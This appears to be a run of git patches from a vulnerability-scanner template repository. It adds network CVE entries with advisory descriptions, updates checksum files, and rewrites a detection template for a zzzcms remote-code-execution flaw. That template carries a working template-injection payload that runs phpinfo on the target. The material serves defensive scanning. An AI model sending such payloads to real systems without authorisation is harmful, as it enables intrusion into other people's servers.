 {"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian \u003c=18.0.49 - Open Redirect","Severity":"medium","Description":"Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is \"the ability to use arbitrary domain names to access the panel is an intended feature.\"\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24044.yaml"}
@@ -2030,3 +2030,20 @@
 {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
+{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
+{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
+{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
+{"ID":"CVE-2016-2004","Info":{"Name":"HP Data Protector - Arbitrary Command Execution","Severity":"critical","Description":"HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2016/CVE-2016-2004.yaml"}
+{"ID":"CVE-2016-3510","Info":{"Name":"Oracle WebLogic Server Java Object Deserialization -  Remote Code Execution","Severity":"critical","Description":"Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2016/CVE-2016-3510.yaml"}
+{"ID":"CVE-2017-3881","Info":{"Name":"Cisco IOS 12.2(55)SE11 - Remote Code Execution","Severity":"critical","Description":"A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2017/CVE-2017-3881.yaml"}
+{"ID":"CVE-2017-5645","Info":{"Name":"Apache Log4j Server - Deserialization Command Execution","Severity":"critical","Description":"In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2017/CVE-2017-5645.yaml"}
+{"ID":"CVE-2018-2628","Info":{"Name":"Oracle WebLogic Server Deserialization - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2018/CVE-2018-2628.yaml"}
+{"ID":"CVE-2018-2893","Info":{"Name":"Oracle WebLogic Server - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2018/CVE-2018-2893.yaml"}
+{"ID":"CVE-2020-11981","Info":{"Name":"Apache Airflow \u003c=1.10.10 - Command Injection","Severity":"critical","Description":"An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-11981.yaml"}
+{"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"}
+{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"}
+{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"}
+{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"}
+{"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"}
+{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"}
+{"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 75780b2f11..8d2d832d28 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-178c3c8d3324b13883efb8fa9d35dc98
+39c60027acb5b66e6e4bb6ad252d317f

From 59151619bc4440583ed658fc41d0364b58e9e405 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 26 Sep 2023 10:19:09 +0530
Subject: [PATCH 0519/1090] req and matcher update

---
 http/cves/2019/CVE-2019-9041.yaml | 40 ++++++++++---------------------
 1 file changed, 13 insertions(+), 27 deletions(-)

diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index 5e689dd94a..679baf3389 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -23,37 +23,23 @@ info:
   tags: cve,cve2019,zzzcms,rce,edb
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/search/"
+  - raw:
+      - |
+        POST /search/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-    headers:
-      Content-Type: application/x-www-form-urlencoded
+      - |
+        POST /search/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-  - method: POST
-    path:
-      - "{{BaseURL}}/search/"
+        keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
 
-    body: |
-      keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
-
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body_1
-        words:
-          - "phpinfo"
-        negative: true
-
-      - type: word
-        part: body_2
-        words:
-          - "phpinfo"
-          - "PHP Version"
-
       - type: dsl
         dsl:
           - 'status_code_2 == 200'
+          - '!contains(body_1, "phpinfo")'
+          - 'contains_all(body_2, "phpinfo","PHP Version")'
+        condition: and

From 41a45c810ca92e2a6495c781ab9be11fa020d59a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 05:45:40 +0000
Subject: [PATCH 0521/1090] Auto Generated Templates Checksum [Tue Sep 26
 05:45:40 UTC 2023] :robot:

---
 templates-checksum.txt | 420 ++++++++++++++++++++---------------------
 1 file changed, 210 insertions(+), 210 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index c7ca22717e..356d81a995 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
 TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:4180679faab89e8b81a6724652ba1daa11c2946d
-cves.json-checksum.txt:fb3e450b753e98ad40d2ae441f41619fbcecbcf9
+cves.json:ea50d934bd6f4d67ccdf4cfba0dd3b997fa1e52c
+cves.json-checksum.txt:263d1c5437bc59b8e969b3db7f11e87193a8ce6d
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -432,7 +432,7 @@ helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e
 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8
 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd702e631526007e426ec31
 helpers/wordpress/plugins/google-listings-and-ads.txt:106ca8d85638866255a70e746e9653cec398864b
-helpers/wordpress/plugins/google-site-kit.txt:1ea542c4af360053318955743814486207238bc6
+helpers/wordpress/plugins/google-site-kit.txt:832bd7a4e59769c7dcc82fc727ab92cd8b7590ce
 helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61
 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5
 helpers/wordpress/plugins/gutenberg.txt:b987da06f27582a0a441e2568c45f3e3f9f47618
@@ -443,7 +443,7 @@ helpers/wordpress/plugins/header-footer-elementor.txt:bce6b7cb2b4348e7bc107654aa
 helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317
 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc
 helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716
-helpers/wordpress/plugins/host-webfonts-local.txt:2d8d7a2994b4a941f25864496a40e7be21769689
+helpers/wordpress/plugins/host-webfonts-local.txt:57efd6c9af996d49184c10d2eb37abea3ad4614c
 helpers/wordpress/plugins/imagify.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
 helpers/wordpress/plugins/imsanity.txt:127ff004f8eef50a85abd75d168e497de8d9a88d
 helpers/wordpress/plugins/insert-headers-and-footers.txt:0b12745e63f19bb65c9778d99891dd5add137111
@@ -509,7 +509,7 @@ helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076
 helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
 helpers/wordpress/plugins/siteorigin-panels.txt:730624dbf2fc592d5ae0f0918a50838ff9d2185b
 helpers/wordpress/plugins/smart-slider-3.txt:2cddd46563a1ae6eca28eb577f99025fd04568f2
-helpers/wordpress/plugins/so-widgets-bundle.txt:c6d5ac7140dfb0d87b85cbf9a9ae5e18202f1872
+helpers/wordpress/plugins/so-widgets-bundle.txt:915e4e0626b26a12a0aed1c0628672549e0743ab
 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53
 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84
 helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9
@@ -543,7 +543,7 @@ helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33
 helpers/wordpress/plugins/woocommerce-services.txt:440a9edb1796d0cd5f2d71aea1a74af81b05abbd
 helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac19
 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
-helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1
+helpers/wordpress/plugins/wordfence.txt:2971ae90e519b3091fe6fadd26cad3aefb8f4043
 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8
 helpers/wordpress/plugins/wordpress-seo.txt:2406229d6e5b4bddde4f12bbe48d4cb7b2c8052d
 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
@@ -556,10 +556,10 @@ helpers/wordpress/plugins/wp-migrate-db.txt:591d71e97a25db692c2f038dbb7d616569b7
 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd
 helpers/wordpress/plugins/wp-optimize.txt:8fb53f1274568d9b7cfb82cfa955cf918a9b148a
 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f
-helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a
+helpers/wordpress/plugins/wp-reset.txt:299ef94535e5fc122da1afbd80be0ba4f6f99c3e
 helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:78aef53da0b8d7a80656c80aa35ad6d410b7f068
 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad
-helpers/wordpress/plugins/wp-seopress.txt:5e56ceb6a3ee0eeaba07ec39a491a470a34c31f7
+helpers/wordpress/plugins/wp-seopress.txt:42ec0805ce498efecaae5f4c79df7d2b5ad63eea
 helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5
 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c
 helpers/wordpress/plugins/wp-statistics.txt:d5b438b33eefd2351317d48768c3cfdcc2e1fbc7
@@ -1372,7 +1372,7 @@ http/cves/2019/CVE-2019-8451.yaml:bd293e0019c05ca1eb75b15375e515f62028c8a1
 http/cves/2019/CVE-2019-8903.yaml:065eb7adbbe9e34a9beab5d8e47d839c532d7b12
 http/cves/2019/CVE-2019-8937.yaml:24506c0b3e74f252122225127b8dbd0aa1ae990f
 http/cves/2019/CVE-2019-8982.yaml:03c6b13d8fb7d84ed16d4cf78641dbb09b28838b
-http/cves/2019/CVE-2019-9041.yaml:0b4f2a11414e8bbd3718067c147817e1b57a74e9
+http/cves/2019/CVE-2019-9041.yaml:aa7ee0138a405d422b66fa5be8e3ca884a489402
 http/cves/2019/CVE-2019-9618.yaml:fa560583a637ecc2b15cf254f68579b6694bceea
 http/cves/2019/CVE-2019-9670.yaml:34282f9e0ee2de7bbb04f155a52575f85c5d7e4d
 http/cves/2019/CVE-2019-9726.yaml:e6148d1f1c420bea11a4e7f5310e2cdceae3238e
@@ -5853,218 +5853,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
